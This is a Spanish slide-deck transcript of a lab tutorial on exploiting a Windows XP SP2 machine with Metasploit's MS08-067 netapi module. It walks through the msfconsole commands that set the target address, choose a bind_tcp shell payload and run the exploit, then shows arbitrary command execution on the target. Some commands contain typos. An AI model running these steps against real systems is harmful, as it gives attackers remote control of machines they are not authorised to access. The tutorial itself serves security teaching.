Msfconsole - Explotar a Windows sp2
description
Transcript of Msfconsole - Explotar a Windows sp2
![Page 1: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/1.jpg)
USO DE MFSCONSOLE
Atacar una maquina con windows xp –sp2 desde Bactrack 5 utilizando msfconsole.
![Page 2: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/2.jpg)
1) Se verifica la IP de la maquina a atacar
![Page 3: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/3.jpg)
2) Se abre una terminal en Backtrack 5. Se verifica la IP pues tienen que estar en el mismo segmento de red. Se digita “msfconcole” para abrir el programa.
![Page 4: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/4.jpg)
3) Así debe aparecer cuando ya inicialice el msfconsole.
![Page 5: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/5.jpg)
4) Se hace una búsqueda del exploit a utilizar con la palabra clave “netapi”. Con el comando : “search netapi”
![Page 6: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/6.jpg)
6)Ya encontrado seleccionamos el exploit con el comando: “use exploit/windows/smb/ms08_67_netapi” damos enter.
![Page 7: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/7.jpg)
7)Verificamos los datos necesarios para atacar la maquina. En este caso es la IP de la maquina con Wxp-sp2.
![Page 8: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/8.jpg)
8) Se configura el RHOST con el comando: “set rhost 192.168.0.104” esta IP es del equipo Wxp-sp2.
![Page 9: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/9.jpg)
9) Se busca el Payload de la misma forma que se busco el exploit. Comando: “search payload”. Cuando finalice la búsqueda utilizaremos especifico con el comando: “set payload windows/shell/bind_tcp” con este comando ingresaremos a la maquina con Wxp-sp2 por medio del cmd.
![Page 10: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/10.jpg)
10) Se pueden ver las opciones de como esta configurado el exploit con el comando: “show options” damos enter.
![Page 11: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/11.jpg)
10) Con esto finaliza toda la configuracion del exploit. Solo queda atacar la maquina con Wxp-sp2 con el comando: “exploit”. Si todo sale bien se ve como sale en la imagen.
![Page 12: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/12.jpg)
12)Puede utilizar cualquier comando de windows ya se haya tomado control de la maquina Wxp-sp2 desde msfconsole de tal forma que puede editar, modificar, eliminar, etc. Cualquier cosa en windows.En este ejemplo se creo una carpeta llamada “hola” con el comando: “mkdir hola” ubicado en el directorio : documments and settings\all users\escritorio
![Page 13: Msfconsole - Explotar a Windows sp2](https://reader035.fdocuments.net/reader035/viewer/2022081508/5577baa3d8b42a1c068b4b02/html5/thumbnails/13.jpg)
GRACIAS.SOLO DE USO EDUCATIVO.